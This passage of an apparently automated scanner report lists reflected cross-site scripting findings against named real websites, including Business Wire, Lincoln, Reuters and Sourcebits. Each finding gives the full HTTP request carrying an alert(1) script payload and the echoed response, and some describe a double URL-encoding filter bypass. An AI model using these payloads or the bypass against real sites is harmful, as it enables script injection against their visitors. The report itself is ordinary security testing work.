Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:24 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/wp-paginate7c35c\"><script>alert(1)</script>f982dad186/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.9. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9628"><script>alert(1)</script>f5d51aa8d7e was submitted in the REST URL parameter 4. This input was echoed as d9628\"><script>alert(1)</script>f5d51aa8d7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-paginate/wp-paginate.cssd9628"><script>alert(1)</script>f5d51aa8d7e?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:25 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:25 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/wp-paginate/wp-paginate.cssd9628\"><script>alert(1)</script>f5d51aa8d7e?ver=1.2.3" />
...[SNIP]...

1.10. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fe35%253cscript%253ealert%25281%2529%253c%252fscript%253e0d8d6a33c35 was submitted in the REST URL parameter 3. This input was echoed as 1fe35<script>alert(1)</script>0d8d6a33c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/201105180052431fe35%253cscript%253ealert%25281%2529%253c%252fscript%253e0d8d6a33c35/en/Cameron-Health-Completes-107-Million-Equity-Financing HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:23:30 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=Bb69NXnCYWVX81xqDhMrmYbzLGmThSCc60Snzj64Fhlm12mBVRtR!1755553180!-1793459085; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 201105180052431fe35<script>alert(1)</script>0d8d6a33c35 and language = en.</span>
...[SNIP]...

1.11. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4e3b%253cscript%253ealert%25281%2529%253c%252fscript%253ec1d8cba65e7 was submitted in the REST URL parameter 4. This input was echoed as c4e3b<script>alert(1)</script>c1d8cba65e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110518005243/enc4e3b%253cscript%253ealert%25281%2529%253c%252fscript%253ec1d8cba65e7/Cameron-Health-Completes-107-Million-Equity-Financing HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:23:43 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=wbfTNXnPxNzz7YSNfQwZMGlPmVzFjzRZpcSDYysT2D3bDMkrSyy6!1755553180!-1793459085; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110518005243 and language = enc4e3b<script>alert(1)</script>c1d8cba65e7.</span>
...[SNIP]...

1.12. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [bannerid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lincoln.com
Path:   /crossovers/mkx/experiencemkx/

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8964f"%3balert(1)//88a261e764f was submitted in the bannerid parameter. This input was echoed as 8964f";alert(1)//88a261e764f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /crossovers/mkx/experiencemkx/?bannerid=5383750|62420317|419606628964f"%3balert(1)//88a261e764f&referrer=AmericaOnline(AOL) HTTP/1.1
Host: www.lincoln.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47
X-Akamai-GTMO: NGBS
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: max-age=86400
Expires: Sat, 21 May 2011 21:48:37 GMT
Date: Fri, 20 May 2011 21:48:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: userInfo=country_code=US,region_code=DC,city=WASHINGTON,county=DISTRICTOFCOLUMBIA,zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.lincoln.com
Content-Length: 108999

<!doctype html>
<!-- Includes are rendered inline-->
<!-- Found : Lincoln-->
<html>
<head>
<link rel="shortcut icon" type="image/x-icon" href="/resources/lincoln/general/img/favicon.ico">
<scrip
...[SNIP]...
_params.segment = "crossovers";
__params.baseURL = "http://www.lincoln.com";
__params.canonicalURL = "/crossovers/mkx/";
__params.anchorPage = "page";
__params.bannerid = "5383750|62420317|419606628964f";alert(1)//88a261e764f";
__params.referrer = "AmericaOnline(AOL)";
__params.domain="lincoln.com";
</script>
...[SNIP]...

1.13. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lincoln.com
Path:   /crossovers/mkx/experiencemkx/

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df0db"%3balert(1)//d957a900dd7 was submitted in the referrer parameter. This input was echoed as df0db";alert(1)//d957a900dd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /crossovers/mkx/experiencemkx/?bannerid=5383750|62420317|41960662&referrer=AmericaOnline(AOL)df0db"%3balert(1)//d957a900dd7 HTTP/1.1
Host: www.lincoln.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47
X-Akamai-GTMO: NGBS
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: max-age=86400
Expires: Sat, 21 May 2011 21:48:38 GMT
Date: Fri, 20 May 2011 21:48:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: userInfo=country_code=US,region_code=DC,city=WASHINGTON,county=DISTRICTOFCOLUMBIA,zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.lincoln.com
Content-Length: 108970

<!doctype html>
<!-- Includes are rendered inline-->
<!-- Found : Lincoln-->
<html>
<head>
<link rel="shortcut icon" type="image/x-icon" href="/resources/lincoln/general/img/favicon.ico">
<scrip
...[SNIP]...
aseURL = "http://www.lincoln.com";
__params.canonicalURL = "/crossovers/mkx/";
__params.anchorPage = "page";
__params.bannerid = "5383750|62420317|41960662";
__params.referrer = "AmericaOnline(AOL)df0db";alert(1)//d957a900dd7";
__params.domain="lincoln.com";
</script>
...[SNIP]...

1.14. http://www.reuters.com/assets/sharedModuleJS [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/sharedModuleJS

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f070f<script>alert(1)</script>d9941c5525a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-NavFlyoutContent2&globalJSVariable=&callback=Reuters.nav.callback2f070f<script>alert(1)</script>d9941c5525a&sp= HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commerceSurveyCheckEventAdded=true; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:38:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5892

Reuters.nav.callback2f070f<script>alert(1)</script>d9941c5525a('<div class="section">    <div class="sectionContent"><div class="sectionColumns"><div class="column1"><div id="navigationIndustries" class=
...[SNIP]...

1.15. http://www.reuters.com/assets/sharedModuleJS [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb576"><script>alert(1)</script>d35ed92e5f7 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-NavFlyoutContent2&globalJSVariable=&callback=Reuters.nav.callback2&sp=bb576"><script>alert(1)</script>d35ed92e5f7 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commerceSurveyCheckEventAdded=true; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:38:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 8001

Reuters.nav.callback2('<div class="section">    <div class="sectionContent"><div class="sectionColumns"><div class="column1"><div id="navigationIndustries" class="module">    <div class="moduleBody">        <div
...[SNIP]...
<a href="bb576"><script>alert(1)</script>d35ed92e5f7/sectors/energy">
...[SNIP]...

1.16. http://www.sourcebits.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 565bd<script>alert(1)</script>4880f07d5a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?565bd<script>alert(1)</script>4880f07d5a7=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:03 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: PHPSESSID=r583tf7ub8lf1h6tc0sn5kp6p3; path=/
Set-Cookie: X-Mapping-nbhajkek=658963BFC10F024A8FB365B882AB799B; path=/
Content-Length: 28611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/?565bd<script>alert(1)</script>4880f07d5a7=1</h2>
...[SNIP]...

1.17. http://www.sourcebits.com/android [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /android

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 939b8<script>alert(1)</script>f5186c06a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /android939b8<script>alert(1)</script>f5186c06a54 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/android939b8<script>alert(1)</script>f5186c06a54</h2>
...[SNIP]...

1.18. http://www.sourcebits.com/android [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /android

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bec13<script>alert(1)</script>51c9202787e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /android?bec13<script>alert(1)</script>51c9202787e=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/android?bec13<script>alert(1)</script>51c9202787e=1</h2>
...[SNIP]...

1.19. http://www.sourcebits.com/blackberry [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /blackberry

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53423<script>alert(1)</script>59d8c2697a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry53423<script>alert(1)</script>59d8c2697a2 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/blackberry53423<script>alert(1)</script>59d8c2697a2</h2>
...[SNIP]...

1.20. http://www.sourcebits.com/blackberry [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /blackberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fb3d<script>alert(1)</script>e20f5e6181b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry?4fb3d<script>alert(1)</script>e20f5e6181b=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/blackberry?4fb3d<script>alert(1)</script>e20f5e6181b=1</h2>
...[SNIP]...

1.21. http://www.sourcebits.com/css/404.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/404.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68854<script>alert(1)</script>51e37141995 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css68854<script>alert(1)</script>51e37141995/404.css?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css68854<script>alert(1)</script>51e37141995/404.css?1292234335</h2>
...[SNIP]...

1.22. http://www.sourcebits.com/css/404.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/404.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d16d"><script>alert(1)</script>d0e0fc3dcca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css3d16d"><script>alert(1)</script>d0e0fc3dcca/404.css?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
